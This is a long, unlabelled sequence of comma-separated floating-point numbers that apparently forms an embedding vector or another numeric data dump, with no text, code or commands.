0.03384711593389511, -0.029385048896074295, -0.009467211551964283, -0.005672988016158342, 0.008160882629454136, -0.04649941995739937, -0.013224740512669086, 0.0025961440987885, 0.013635720126330853, 0.013833871111273766, 0.0002940156264230609, 0.018097786232829094, -0.022897440940141678, -0.018802322447299957, -0.0532512292265892, -0.0057133520022034645, -0.04092183709144592, -0.020871898159384727, -0.004762961529195309, -0.008285644464194775, -0.006579345092177391, 0.04511970281600952, -0.0025722926948219538, -0.06499350816011429, -0.023176319897174835, -0.006425227504223585, -0.001008184626698494, 0.000798566616140306, -0.012593592517077923, -0.03393518179655075, 0.02882729098200798, -0.05078535154461861, -0.006465591490268707, -0.02781452052295208, 0.009452533908188343, 0.02181128039956093, -0.024394581094384193, 0.011823005974292755, -0.011419365182518959, 0.005830774549394846, -0.0008325091330334544, -0.014127427712082863, 0.01748131588101387, -0.0003699276130646467, 0.011492754332721233, -0.009320433251559734, -0.0018420697888359427, 0.030177652835845947, -0.0026603597216308117, -0.012762388214468956, 0.000010664372894098051, -0.05069728195667267, -0.019345402717590332, -0.030207009986042976, -0.028563089668750763, -0.029003426432609558, -0.005485845264047384, 0.009445194154977798, 0.010450626723468304, -0.00011650541273411363, 0.025921078398823738, -0.0035538736265152693, -0.018215207383036613, -0.0022071811836212873, 0.016674034297466278, -0.023968923836946487, 0.00270255864597857, -0.0026787070091813803, 0.04338771477341652, -0.013173367828130722, -0.0296639297157526, -0.004553801845759153, 0.06516963988542557, -0.016688711941242218, 0.004032738506793976, -0.03279031068086624, -0.0024860603734850883, 0.009489228017628193, -0.029605217278003693, 0.017070336267352104, -0.012916505336761475, 0.027315473183989525, -0.01962428167462349, 0.05330993980169296, 0.03992374241352081, -0.02888600341975689, -0.015822719782590866, 0.0066967676393687725, 0.032320618629455566, -0.015778684988617897, 0.004429040476679802, 0.0023539597168564796, -0.01332748495042324, -0.0005357413901947439, 0.017951006069779396, -0.00830766186118126, -0.017936328426003456, 0.05659777671098709, -0.03807433694601059, -0.027594352141022682, -0.0176574494689703, 0.01853812113404274, -0.0030713395681232214, -0.0030383144039660692, 0.0059518669731915, -0.019037168473005295, -0.031410593539476395, -0.010714828036725521, 0.03182157129049301, 0.01547045074403286, 0.03170415014028549, -0.015675941482186317, -0.009503905661404133, 0.014303562231361866, 0.01130928099155426, -0.0005439976812340319, -0.025084441527724266, 0.001750333234667778, -0.010957012884318829, -0.05592259764671326, 0.02666964754462242, -0.002113610040396452, 0.024291837587952614, -0.01837666518986225, 0.00487304525449872, -0.025568809360265732, -0.009357127360999584, -0.006370185408741236, -0.002040220657363534, -0.00438867649063468, -0.019242657348513603, -0.04861303046345711, 0.002867684466764331, -0.0031117035541683435, 0.027139339596033096, -0.03176286071538925, 0.0016466709785163403, 0.043710630387067795, -0.026390768587589264, -0.011808328330516815, -0.005328058265149593, -0.04221348837018013, -0.02574494294822216, 0.01234406977891922, -0.03220319747924805, -0.018083106726408005, 0.017202436923980713, -0.036694616079330444, 0.015910785645246506, -0.03710559755563736, 0.014443001709878445, 0.015529162250459194, 0.021033354103565216, -0.01084692869335413, 0.03839724883437157, -0.049053363502025604, 0.023910213261842728, -0.017818905413150787, 0.007845309562981129, -0.024291837587952614, -0.030441854149103165, -0.004759292118251324, -0.03129316866397858, -0.011441381648182869, 0.052928317338228226, 0.025231219828128815, 0.019316047430038452, -0.022824052721261978, 0.038485314697027206, 0.003922654781490564, 0.018273919820785522, -0.014024683274328709, -0.020945288240909576, 0.011588159948587418, -0.02182595804333687, 0.015162215568125248, 0.007280212361365557, 0.0009458037675358355, 0.0064766001887619495, 0.04418031871318817, 0.030265720561146736, 0.014677846804261208, -0.00665640365332365, -0.026420123875141144, -0.0026768723037093878, 0.005074865650385618, 0.01130194216966629, -0.029385048896074295, -0.017730839550495148, 0.0004719845310319215, 0.008747996762394905, 0.010428610257804394, 0.014912692829966545, 0.0374872200191021, -0.016042886301875114, -0.019183946773409843, 0.011221214197576046, -0.02782919816672802, 0.039688900113105774, -0.015837397426366806, 0.043945472687482834, -0.0010017630411311984, -0.02159111388027668, -0.0038712820969522, 0.009929563850164413, -0.010597405955195427, 0.022985508665442467, -0.0108542675152421, 0.02371940016746521, 0.02279469557106495, -0.05146053060889244, -0.0032841681968420744, -0.014244850724935532, -0.0076178028248250484, 0.0108542675152421, -0.018053751438856125, -0.016630001366138458, -0.03367098048329353, 0.03710559755563736, -0.027609029784798622, -0.044914212077856064, -0.017011623829603195, 0.02051963098347187, 0.014699864201247692, -0.010634100064635277, 0.06158824637532234, -0.05245862528681755, 0.008549845777451992, -0.011426704004406929, 0.04726266860961914, 0.039542119950056076, -0.023014863952994347, 0.03596072643995285, -0.0000577653554501012, -0.028181467205286026, 0.022325005382299423, 0.004707919433712959, 0.0374872200191021, -0.04191993176937103, -0.025891723111271858, 0.014516390860080719, 0.05765458196401596, 0.023411165922880173, -0.005761054810136557, -0.008491134271025658, -0.022075481712818146, 0.0030383144039660692, -0.021400300785899162, 0.01023045927286148, -0.006109653972089291, 0.023161642253398895, 0.02565687708556652, 0.02038753032684326, 0.0047372751869261265, 0.020123329013586044, 0.021385623142123222, -0.01032586582005024, -0.022090159356594086, 0.0331425778567791, 0.027476929128170013, -0.0001431090058758855, -0.027198050171136856, -0.034492939710617065, -0.015998853370547295, -0.04244833439588547, -0.02984006330370903, -0.0017118039540946484, 0.019976550713181496, 0.010494660586118698, -0.02994280867278576, -0.030559277161955833, -0.0037978929467499256, -0.045794881880283356, -0.025201862677931786, -0.012505525723099709, 0.03678268566727638, -0.008329678326845169, -0.022178227081894875, 0.03643041476607323, 0.009100264869630337, -0.008388389833271503, 0.031557369977235794, -0.00697564659640193, -0.02573026530444622, 0.0008971833740361035, 0.0312638133764267, -0.015602551400661469, -0.002614491619169712, 0.01739324815571308, -0.015250283293426037, -0.016189664602279663, 0.04294738173484802, 0.05263476073741913, 0.006208729464560747, -0.015558517538011074, -0.017040980979800224, -0.02979603037238121, 0.021224167197942734, 0.009335110895335674, -0.00025915572769008577, -0.018127141520380974, 0.0023741417098790407, 0.058182984590530396, -0.0025025729555636644, -0.012784404680132866, 0.0113239586353302, -0.023029541596770287, 0.015998853370547295, -0.03173350542783737, -0.011213875375688076, -0.012571576051414013, 0.03739915415644646, -0.005045509897172451, -0.0012292696628719568, -0.003126381430774927, 0.005346405785530806, 0.020871898159384727, 0.0154851283878088, -0.01746663823723793, -0.014721880666911602, -0.013731125742197037, 0.012718354351818562, -0.021943381056189537, -0.02160579152405262, -0.008292983286082745, 0.03276095539331436, -0.010575388558208942, -0.014046699739992619, 0.0005274851573631167, 0.029443761333823204, 0.009012198075652122, -0.01660064421594143, -0.034346163272857666, -0.032438043504953384, 0.02978135086596012, -0.007801275700330734, -0.02364601194858551, -0.003911646082997322, -0.014296223409473896, 0.014670507982373238, -0.028665835037827492, -0.008300322107970715, -0.01486132014542818, 0.02279469557106495, 0.003981365822255611, 0.0369001068174839, 0.009518584236502647, 0.003658453468233347, -0.017246469855308533, -0.0035300222225487232, 0.03575523570179939, 0.027374185621738434, -0.005309711210429668, 0.04294738173484802, -0.008557184599339962, -0.005761054810136557, -0.03408196195960045, -0.005562903825193644, -0.008564523421227932, -0.03102896921336651, 0.026185279712080956, 0.006751809734851122, -0.010296509601175785, -0.018905067816376686, -0.0057280296459794044, -0.00866726879030466, 0.015837397426366806, 0.0025906399823725224, 0.03381776064634323, -0.0408044159412384, 0.022442428395152092, -0.046734265983104706, 0.008527829311788082, 0.013055944815278053, -0.005328058265149593, 0.012468830682337284, 0.002786956261843443, -0.00013863685308024287, 0.0226479172706604, 0.0016732745571061969, 0.0022071811836212873, -0.012916505336761475, 0.014795269817113876, -0.01285779383033514, -0.022501138970255852, 0.0013668745523318648, 0.017129046842455864, 0.0013411883264780045, -0.015338350087404251, 0.003665792290121317, -0.02473217248916626, 0.00486570643261075, 0.0062894574366509914, -0.0010843259515240788, 0.03742850944399834, -0.025319285690784454, -0.00044859168701805174, 0.024071669206023216, 0.016248377040028572, 0.04975790157914162, -0.008256289176642895, 0.0009247043635696173, 0.027065949514508247, -0.023323098197579384, -0.0004497384070418775, -0.0004806994984392077, -0.02876858040690422, 0.007962731644511223, -0.020769152790308, 0.024423938244581223, 0.022457106038928032, 0.04130346328020096, -0.02050495147705078, -0.01345958560705185, 0.019873805344104767, -0.0006485773483291268, -0.009459872730076313, 0.005328058265149593, -0.012534881010651588, -0.027051271870732307, 0.0001108292126446031, 0.0008352612494491041, -0.004131813999265432, 0.0004912492004223168, -0.004821672569960356, 0.015719974413514137, 0.0017778542824089527, -0.01874361000955105, 0.030471211299300194, 0.02975199557840824, -0.06258633732795715, -0.03601943701505661, 0.01968299224972725, 0.02075447514653206, 0.004256575834006071, -0.021268200129270554, 0.015279638580977917, 0.01837666518986225, 0.030148297548294067, 0.010927657596766949, 0.0045244465582072735, -0.010729506611824036, -0.031381238251924515, -0.01126524806022644, 0.008916792459785938, -0.021003998816013336, 0.005350075196474791, 0.0005435390048660338, -0.04608843848109245, 0.015558517538011074, 0.0026108219753950834, -0.02051963098347187, 0.005595928989350796, -0.03387647122144699, -0.008770013228058815, -0.003896968439221382, -0.016189664602279663, -0.017143724486231804, 0.04952305555343628, 0.01285779383033514, -0.02386617846786976, -0.026229312643408775, 0.02349923364818096, 0.004234558902680874, 0.001109094824641943, -0.018215207383036613, -0.0008907618466764688, -0.01191841159015894, 0.032584819942712784, -0.008395728655159473, -0.017745517194271088, -0.02279469557106495, 0.018831677734851837, -0.009239704348146915, 0.009621328674256802, 0.007082061376422644, 0.02678707055747509, -0.01748131588101387, -0.025422031059861183, 0.007401304319500923, -0.0013696266105398536, -0.0014109080657362938, -0.028401633724570274, 0.042829956859350204, 0.04294738173484802, -0.02891535870730877, 0.005838113836944103, -0.0176574494689703, -0.037634000182151794, -0.01547045074403286, 0.009591973386704922, 0.012182612903416157, -0.01282843854278326, -0.02461474947631359, 0.004513437859714031, 0.015587873756885529, 0.003988705109804869, -0.01329079084098339, 0.001319171511568129, 0.030324431136250496, 0.01767212711274624, -0.03190964087843895, -0.022824052721261978, 0.03099961206316948, 0.01755470596253872, -0.019242657348513603, -0.00109716912265867, 0.006050942465662956, -0.007889342494308949, 0.005082204472273588, 0.002440192038193345, -0.018127141520380974, -0.005779402330517769, -0.01955089159309864, -0.0049537732265889645, -0.0454426147043705, -0.010091019794344902, 0.05656842142343521, -0.00664172600954771, 0.04344642907381058, 0.015543839894235134, 0.018185852095484734, -0.038514669984579086, 0.0072508566081523895, -0.00866726879030466, -0.03393518179655075, -0.008946147747337818, -0.0018705081893131137, 0.003933663014322519, -0.0023447859566658735, 0.0008375546312890947, -0.005019823554903269, 0.03678268566727638, -0.01344490796327591, -0.01745196059346199, 0.03499198704957962, -0.01022312045097351, 0.001795284217223525, -0.0066857594065368176, -0.01734921522438526, 0.020226072520017624, 0.028005331754684448, -0.0235872995108366, 0.009122282266616821, -0.004825342446565628, -0.0216351468116045, -0.025128474459052086, -0.03461036458611488, -0.04556003585457802, -0.02683110535144806, -0.03634234890341759, 0.0015998852904886007, -0.0015907116467133164, -0.012314713560044765, 0.009467211551964283, 0.015749329701066017, 0.013033928349614143, -0.020372850820422173, -0.029179560020565987, -0.010736845433712006, 0.007320576347410679, -0.038602739572525024, 0.015866752713918686, 0.013577008619904518, -0.01764277182519436, -0.0017457464709877968, 0.014244850724935532, 0.021077388897538185, 0.027564996853470802, 0.017129046842455864, -0.02154707908630371, -0.009643345139920712, -0.01646854355931282, 0.01394395437091589, 0.026845782995224, -0.01343023031949997, 0.039747610688209534, 0.010678133927285671, 0.004913409240543842, 0.006032594945281744, -0.04858367517590523, -0.014142105355858803, 0.015617229044437408, 0.01853812113404274, 0.02279469557106495, 0.0036768007557839155, -0.0020548985339701176, -0.012718354351818562, 0.023968923836946487, 0.00819023884832859, 0.01547045074403286, 0.02255985140800476, 0.017099691554903984, 0.015308994799852371, 0.00665640365332365, 0.018039073795080185, -0.004762961529195309, 0.013055944815278053, -0.0027337491046637297, -0.0675768107175827, 0.0013586182612925768, 0.010648777708411217, -0.03290773183107376, -0.011867038905620575, 0.022236937656998634, 0.000020282375771785155, 0.014545746147632599, -0.02881261333823204, 0.028210822492837906, -0.022501138970255852, 0.007896681316196918, -0.02150304615497589, -0.017965685576200485, 0.00772788655012846, -0.0049464344047009945, 0.011690905317664146, 0.019154589623212814, 0.016967590898275375, -0.016879525035619736, 0.039571475237607956, -0.006821529474109411, 0.00819757767021656, -0.035579100251197815, -0.00008789507410256192, 0.013048605993390083, 0.007280212361365557, -0.03478649631142616, 0.03575523570179939, 0.029575861990451813, -0.05245862528681755, -0.02578897774219513, 0.00541245611384511, -0.022926796227693558, -0.015323672443628311, 0.013980649411678314, -0.019242657348513603, 0.031146392226219177, 0.006869232282042503, -0.004975790157914162, 0.0074783628806471825, 0.0038492653984576464, 0.008762674406170845, 0.02467346005141735, -0.019316047430038452, -0.017143724486231804, 0.0025906399823725224, -0.002012699842453003, 0.009357127360999584, 0.009056231938302517, 0.019301369786262512, -0.03807433694601059, 0.01746663823723793, 0.009092926047742367, 0.02587704360485077, 0.004307948052883148, -0.01128726452589035, 0.01739324815571308, -0.010546033270657063, -0.021943381056189537, -0.00697564659640193, 0.011037740856409073, -0.008417745120823383, 0.009180993773043156, -0.0072728730738162994, 0.0051005519926548, -0.011823005974292755, 0.02672835998237133, -0.00772788655012846, -0.0020952627528458834, -0.011052418500185013, -0.0031594065949320793, -0.005463828798383474, -0.014178800396621227, -0.0029906113632023335, 0.003649279708042741, 0.002517250832170248, -0.017995040863752365, 0.018229886889457703, 0.04335835948586464, -0.006781165488064289, 0.03695881739258766, -0.015308994799852371, 0.0014512721681967378, 0.012197290547192097, -0.017980363219976425, 0.03220319747924805, -0.013745803385972977, 0.023264387622475624, 0.014435662887990475, -0.019462825730443, -0.0055078621953725815, 0.017774872481822968, 0.03508005291223526, -0.028563089668750763, -0.0350213423371315, 0.0023668028879910707, -0.02181128039956093, -0.024306515231728554, 0.0023723070044070482, 0.030177652835845947, 0.007551752496510744, -0.01864086650311947, -0.029326338320970535, 0.004007052164524794, -0.01950685866177082, 0.0006141761550679803, 0.024321192875504494, -0.004252905957400799, 0.0047336057759821415, 0.02166450209915638, 0.004282261710613966, 0.008513151668012142, -0.017026303336024284, 0.005650971084833145, -0.03701753169298172, -0.009525923058390617, 0.00258146645501256, 0.010164408944547176, 0.013268773443996906, -0.025510098785161972, -0.024086346849799156, 0.04309415817260742, 0.016028208658099174, -0.01485398132354021, -0.03569652512669563, -0.0041611697524785995, -0.008146204985678196, -0.004230889491736889, 0.007771919947117567, -0.012542220763862133, 0.014288883656263351, -0.023910213261842728, 0.01191107276827097, 0.046704910695552826, 0.00620139017701149, 0.00819757767021656, 0.015764007344841957, 0.03898436203598976, 0.010890962556004524, 0.007371948566287756, -0.030588632449507713, -0.01483930367976427, -0.012160596437752247, -0.044650010764598846, 0.03587265685200691, 0.0047409445978701115, 0.04846625030040741, -0.012681660242378712, 0.0154851283878088, -0.005761054810136557, 0.008050799369812012, 0.00774990301579237, -0.02060769684612751, -0.038749516010284424, 0.0076691750437021255, -0.005900494288653135, 0.0022567189298570156, -0.0012320218374952674, 0.005742707755416632, -0.007764581125229597, 0.009078248403966427, -0.016204342246055603, 0.015690619125962257, -0.051049552857875824, 0.025260575115680695, -0.03217384219169617, -0.021253522485494614, -0.0007453594007529318, -0.00037084496580064297, 0.030295075848698616, 0.01393661554902792, -0.010032308287918568, 0.021048033609986305, 0.025201862677931786, 0.0038382569327950478, -0.016644679009914398, -0.035520389676094055, -0.04602972790598869, -0.04215477779507637, -0.009217687882483006, -0.002427348867058754, -0.01126524806022644, 0.003286002902314067, -0.027212727814912796, -0.005695004481822252, -0.02370472252368927, 0.028665835037827492, 0.03372969105839729, 0.021033354103565216, -0.0004995054914616048, -0.009496566839516163, 0.020783832296729088, 0.010744184255599976, -0.022838730365037918, -0.0022493801079690456, -0.037751421332359314, -0.005463828798383474, 0.025289930403232574, 0.00434831203892827, -0.007030688691884279, 0.032467398792505264, -0.023235032334923744, 0.02182595804333687, 0.004983128979802132, -0.015852075070142746, 0.00865992996841669, -0.002537432825192809, -0.01730518229305744, -0.015206249430775642, 0.04024665802717209, 0.006388532929122448, -0.015147537924349308, -0.02665496990084648, 0.009599312208592892, 0.01130194216966629, 0.0004148785083089024, -0.011140486225485802, 0.002814477076753974, 0.0025869705714285374, 0.024394581094384193, -0.045618750154972076, -0.0011063427664339542, -0.013129333965480328, -0.028519056737422943, -0.0296639297157526, -0.028298888355493546, -0.025935756042599678, -0.027315473183989525, 0.008645252324640751, 0.0012283523101359606, 0.011830344796180725, -0.02893003635108471, 0.020270107313990593, 0.002719071228057146, 0.02062237448990345, -0.031498659402132034, -0.014215494506061077, -0.037663355469703674, 0.017246469855308533, 0.006054611876606941, 0.006861893460154533, 0.03913113847374916, -0.02693384885787964, 0.02164982445538044, -0.008080154657363892, 0.0060692899860441685, 0.04092183709144592, -0.019022488966584206, -0.008608557283878326, -0.013775159604847431, -0.01864086650311947, 0.00043528989772312343, 0.016659356653690338, -0.010039647109806538, 0.016174986958503723, 0.0019705009181052446, 0.01874361000955105, -0.0020604028832167387, 0.0003813946677837521, 0.0022603883408010006, 0.02065173164010048, 0.004513437859714031, 0.003988705109804869, 0.009812140837311745, -0.008461778983473778, -0.035432323813438416, 0.0011687235673889518, 0.03616621345281601, -0.02051963098347187, -0.023014863952994347, 0.00617203488945961, 0.0028181467205286026, -0.0019851787947118282, 0.013819193467497826, -0.012263340875506401, 0.018758287653326988, -0.009613989852368832, 0.007280212361365557, -0.016820812597870827, 0.03490392118692398, -0.011470737867057323, -0.014523729681968689, 0.015353027731180191, 0.007874664850533009, -0.02071044221520424, -0.027330150827765465, 0.007085730787366629, -0.007874664850533009, -0.0071811368688941, 0.007038027513772249, -0.020196717232465744, -0.017921650782227516, -0.01754002645611763, -0.01544109545648098, 0.0016971260774880648, -0.02255985140800476, -0.005794079974293709, 0.011404687538743019, 0.0005939941038377583, -0.023102931678295135, -0.03076476790010929, 0.02471749484539032, -0.0086819464340806, 0.008278305642306805, -0.015294316224753857, -0.008292983286082745, -0.016057563945651054, -0.007815953344106674, 0.0024512005038559437, -0.018127141520380974, 0.02169385738670826, -0.018934423103928566, -0.000657751050312072, 0.009885529987514019, -0.013606363907456398, 0.013085301034152508, -0.014200816862285137, -0.014751235954463482, -0.016703389585018158, -0.013628381304442883, -0.017789550125598907, -0.013268773443996906, 0.00924704410135746, 0.042859312146902084, 0.09112007170915604, -0.013510958291590214, 0.006872901692986488, 0.0005417042993940413, 0.0064876084215939045, 0.00973875168710947, -0.01745196059346199, -0.007771919947117567, 0.014142105355858803, 0.00018014763190876693, 0.015382383950054646, -0.0020420553628355265, 0.011529448442161083, 0.017877617850899696, 0.023440521210432053, 0.0016512577421963215, 0.001891607535071671, -0.01545577310025692, 0.012630287557840347, -0.02681642584502697, 0.01633644290268421, 0.015294316224753857, 0.0022805705666542053, -0.000032709813240217045, 0.02172321453690529, -0.025216540321707726, -0.03387647122144699, -0.015206249430775642, -0.026155922561883926, -0.013701770454645157, 0.019462825730443, -0.02273598499596119, -0.005052848719060421, 0.005984892137348652, -0.000980663695372641, 0.004337303806096315, 0.012718354351818562, 0.002093428047373891, -0.006597692146897316, -0.02056366391479969, 0.0021484699100255966, -0.014457679353654385, -0.03102896921336651, 0.0034823191817849874, -0.007691191975027323, -0.01853812113404274, 0.01955089159309864, 0.004810664337128401, -0.008248950354754925, -0.002012699842453003, 0.008447101339697838, -0.0150154372677207, 0.02774113044142723, 0.006553658749908209, -0.006627047900110483, 0.013019250705838203, -0.012608270160853863, -0.014325578697025776, -0.008300322107970715, -0.021370945498347282, -0.001346692442893982, 0.013782498426735401, -0.0038382569327950478, 0.009503905661404133, -0.01345958560705185, -0.00865992996841669, -0.025495421141386032, 0.018288597464561462, -0.028563089668750763, 0.019859127700328827, -0.0024310185108333826, -0.0013806349597871304, 0.0036034113727509975, -0.01192575041204691, 0.00976810697466135, 0.015940142795443535, 0.025510098785161972, 0.03918985277414322, -0.033348068594932556, -0.012028495781123638, 0.025172507390379906, 0.027432896196842194, -0.029443761333823204, 0.03161608427762985, -0.009217687882483006, 0.015573196113109589, -0.021297555416822433, 0.009914885275065899, -0.002612656680867076, -0.011206536553800106, 0.00748570216819644, -0.0004307030758354813, 0.01332748495042324, -0.00282365083694458, -0.006748140323907137, 0.020798509940505028, 0.011845022439956665, -0.007977410219609737, -0.022222260013222694, -0.0035868987906724215, 0.009547939524054527, 0.006318813189864159, 0.023205677047371864, -0.02348455600440502, -0.030236365273594856, 0.019961871206760406, 0.004806994926184416, 0.01498608198016882, -0.007603124715387821, -0.003174084471538663, -0.012674320489168167, -0.0027172365225851536, 0.033406779170036316, -0.009922225028276443, -0.018185852095484734, 0.014809947460889816, -0.00205673323944211, -0.0020879236981272697, -0.02464410476386547, -0.01020844280719757, -0.018083106726408005, -0.01739324815571308, 0.015822719782590866, -0.020886575803160667, 0.031469304114580154, 0.032379329204559326, 0.02172321453690529, -0.014523729681968689, 0.029546506702899933, 0.03604879230260849, -0.0006449078791774809, 0.0053023723885416985, -0.003775876248255372, -0.0007082061492837965, 0.01762809418141842, -0.025113796815276146, 0.01963895931839943, 0.010024969466030598, -0.025568809360265732, -0.0041611697524785995, 0.010575388558208942, 0.020049938932061195, 0.015118182636797428, 0.024321192875504494, -0.008124188520014286, -0.013496280647814274, 0.009401161223649979, 0.01743728294968605, 0.01843537576496601, -0.015088826417922974, -0.009078248403966427, -0.023029541596770287, -0.017114369198679924, 0.007137103006243706, 0.014501713216304779, 0.00005633196997223422, 0.015030115842819214, -0.0026915501803159714, 0.007199483923614025, -0.006043603643774986, -0.0030364796984940767, -0.009577294811606407, 0.02982538565993309, -0.009628667496144772, 0.004399684723466635, 0.015411739237606525, -0.0003671755257528275, -0.03584330156445503, -0.015074148774147034, -0.020240750163793564, 0.01282109972089529, -0.0076691750437021255, -0.02976667322218418, 0.0287245474755764, 0.016835490241646767, 0.009892868809401989, -0.01080289576202631, 0.009481889195740223, 0.0235139112919569, -0.02270662970840931, -0.024042313918471336, 0.0017402422381564975, -0.013811853714287281, -0.014332917518913746, 0.03425809368491173, -0.028386956080794334, -0.00877735298126936, 0.01082491222769022, -0.04300609230995178, 0.007632480468600988, -0.005317050032317638, 0.013532974757254124, -0.002234702231362462, -0.013019250705838203, 0.016879525035619736, -0.009980935603380203, 0.001999856671318412, -0.011500093154609203, -0.01036255992949009, 0.005522539839148521, -0.01658596657216549, -0.0061280010268092155, -0.004840020090341568, 0.007970071397721767, -0.0005201462190598249, -0.02360197715461254, -0.01235874742269516, 0.049934037029743195, -0.0009292911854572594, -0.012578914873301983, -0.0287245474755764, 0.02267727442085743, 0.016307087615132332, 0.00039905396988615394, 0.03569652512669563, 0.01497140433639288, 0.008439762517809868, -0.002258553635329008, -0.02041688561439514, 0.003005289239808917, -0.03132252395153046, -0.0018283093813806772, 0.006516964174807072, -0.009195671416819096, -0.046881042420864105, -0.0013255930971354246, 0.02057834155857563, -0.005056518130004406, 0.02166450209915638, 0.015338350087404251, -0.03695881739258766, 0.0016989607829600573, -0.0017053823685273528, 0.008021443150937557, -0.0034419551957398653, 0.0030364796984940767, 0.013276112265884876, 0.006549989338964224, 0.010516677051782608, 0.01392193790525198, -0.00001618289934413042, 0.00019895362493116409, -0.0351681225001812, -0.015103504993021488, -0.004476743284612894, -0.00019138536299578846, -0.005551895592361689, -0.005764724221080542, -0.023381810635328293, 0.020270107313990593, -0.0074563464149832726, -0.022501138970255852, 0.002895205281674862, -0.008762674406170845, -0.008373712189495564, 0.02278001792728901, -0.01745196059346199, -0.009636006318032742, -0.004502429626882076, -0.001891607535071671, 0.0037373467348515987, -0.019330725073814392, -0.0032603167928755283, 0.015764007344841957, -0.02063705213367939, 0.024027636274695396, -0.018200529739260674, 0.012109223753213882, 0.023176319897174835, 0.0031447287183254957, 0.012777065858244896, -0.0034309467300772667, 0.010435949079692364, -0.020035261288285255, -0.010714828036725521, -0.004274922888725996, 0.00877735298126936, 0.002875023288652301, -0.010568049736320972, 0.0018934422405436635, 0.007867326028645039, 0.02976667322218418, 0.00337040051817894, -0.02693384885787964, -0.013687092810869217, -0.03132252395153046, -0.0031961011700332165, 0.017158403992652893, -0.017246469855308533, -0.02690449357032776, 0.026376090943813324, -0.002348455600440502, -0.0014283380005508661, -0.018949100747704506, 0.02043156325817108, 0.014032022096216679, -0.029473116621375084, 0.02868051268160343, -0.012145918793976307, 0.012417458929121494, 0.0010953343007713556, 0.040540214627981186, 0.007522396743297577, -0.011257908307015896, -0.012762388214468956, -0.007313237525522709, -0.010861607268452644, 0.00883606355637312, 0.014076055027544498, 0.002665864070877433, -0.015734652057290077, -0.00296859466470778, -0.01655661128461361, -0.023968923836946487, -0.0076691750437021255, -0.011830344796180725, -0.00819757767021656, 0.00027498029521666467, -0.014604457654058933, 0.021855315193533897, 0.0150154372677207, -0.01949218101799488, -0.034375518560409546, -0.04221348837018013, -0.01281376089900732, 0.015338350087404251, 0.016013531014323235, -0.0024860603734850883, 0.012094546109437943, -0.01944814808666706, 0.005133577156811953, 0.027432896196842194, 0.034551650285720825, -0.01949218101799488, 0.008740657940506935, 0.007830630987882614, 0.0029392389114946127, 0.0074746934697031975, -0.01748131588101387, 0.004212541971355677, -0.012446814216673374, 0.01127992570400238, -0.00008072816126514226, 0.017848262563347816, 0.021840635687112808, -0.0020842542871832848, -0.02182595804333687, 0.014934709295630455, -0.006876571569591761, -0.018053751438856125, -0.01239544153213501, -0.0012448648922145367, 0.004792317282408476, -0.0015668601263314486, 0.009841496124863625, 0.015573196113109589, -0.0022603883408010006, -0.0037318426184356213, 0.008718641474843025, -0.03463971987366676, -0.018963778391480446, -0.023352455347776413, -0.007911359891295433, -0.0045354547910392284, 0.02038753032684326, -0.007173797581344843, -0.0002763563534244895, 0.015220927074551582, -0.0033263671211898327, -0.006425227504223585, -0.004711588844656944, 0.005496853496879339, 0.02672835998237133, 0.0041685085743665695, 0.015382383950054646, 0.0024768866132944822, 0.008461778983473778, -0.01345224678516388, -0.009812140837311745, 0.03672397509217262, 0.009188332594931126, -0.009136959910392761, -0.01564658433198929, 0.01286513265222311, -0.00865992996841669, -0.008072815835475922, 0.0007036192691884935, 0.0038455959875136614, 0.008043460547924042, -0.004128144588321447, 0.009232365526258945, 0.02470281720161438, 0.0003174084413331002, 0.029047459363937378, 0.011712921783328056, -0.009848834946751595, -0.008953486569225788, 0.014252189546823502, -0.023939568549394608, 0.007647158112376928, -0.013026589527726173, -0.006520633585751057, 0.0029979501850903034, 0.02044624090194702, -0.013679753057658672, 0.0066967676393687725, -0.008946147747337818, -0.007551752496510744, 0.017892295494675636, -0.016791457310318947, 0.0035318569280207157, 0.0037942235358059406, 0.0051555936224758625, 0.005801419261842966, -0.011235891841351986, -0.011969784274697304, 0.003335540648549795, 0.022104837000370026, -0.00929841585457325, 0.003021801821887493, 0.029032781720161438, 0.01731985993683338, -0.011015724390745163, -0.026449481025338173, 0.0016163978725671768, -0.004065763670951128, -0.0031043647322803736, -0.002564953872933984, 0.008916792459785938, -0.022369038313627243, -0.010883623734116554, 0.01947750337421894, -0.004513437859714031, -0.016659356653690338, -0.00822693295776844, -0.001144872047007084, -0.023279065266251564, -0.015191571786999702, -0.019257334992289543, 0.016307087615132332, 0.02054898627102375, -0.01640983298420906, -0.0011402852833271027, -0.009335110895335674, 0.00972407404333353, 0.0025502759963274, -0.02175256982445717, -0.013136672787368298, -0.008432422764599323, 0.01079555694013834, 0.004271253477782011, -0.011969784274697304, 0.00465287733823061, 0.012887150049209595, -0.02038753032684326, 0.004557471722364426, 0.0017998709809035063, -0.008535168133676052, -0.00121826131362468, -0.014142105355858803, 0.03584330156445503, -0.02352858893573284, 0.02254517376422882, 0.0015760337701067328, -0.0005861964891664684, 0.015749329701066017, -0.008021443150937557, -0.01485398132354021, -0.008153543807566166, 0.004084110725671053, 0.021444333717226982, 0.017290504649281502, 0.004821672569960356, -0.008131527341902256, -0.0035300222225487232, -0.014112750068306923, -0.002029212424531579, -0.019389435648918152, 0.006157356780022383, 0.003638271242380142, -0.0020989321637898684, 0.007889342494308949, -0.01176429446786642, -0.010934996418654919, -0.008285644464194775, -0.013665075413882732, 0.001391643425449729, 0.006311474367976189, 0.002198007656261325, -0.0033098545391112566, 0.01081757340580225, -0.007948054000735283, 0.0045868270099163055, 0.0036437755916267633, 0.03164543956518173, 0.015793362632393837, 0.016952913254499435, -0.00019677488307934254, -0.004062094260007143, -0.008637912571430206, -0.01965363696217537, -0.028416311368346214, 0.009511244483292103, -0.005790410563349724, 0.0035630473867058754, 0.00375018990598619, -0.010729506611824036, -0.00978278461843729, 0.017011623829603195, -0.02057834155857563, 0.004696911200881004, 0.0014576936373487115, 0.002251214813441038, -0.010179086588323116, 0.0039776964113116264, 0.0012173439608886838, -0.022266294807195663, -0.016130954027175903, -0.029487794265151024, -0.00620139017701149, 0.005790410563349724, 0.004362990148365498, 0.010700150392949581, -0.02584768831729889, 0.004979459568858147, 0.0016356626292690635, 0.0163511224091053, -0.00697564659640193, -0.003874951507896185, -0.023146964609622955, 0.004443718120455742, -0.0005972048966214061, -0.016307087615132332, 0.007063713856041431, 0.011969784274697304, 0.004208872560411692, -0.00032337132142856717, -0.001774184755049646, 0.0012494517723098397, 0.0030071239452809095, 0.009379143826663494, -0.011257908307015896, 0.004047416150569916, 0.0235872995108366, 0.012630287557840347, -0.016042886301875114, -0.0019283021101728082, 0.0014044864801689982, -0.009041553363204002, 0.010604744777083397, 0.011705582961440086, 0.019183946773409843, -0.0033685658127069473, -0.007401304319500923, 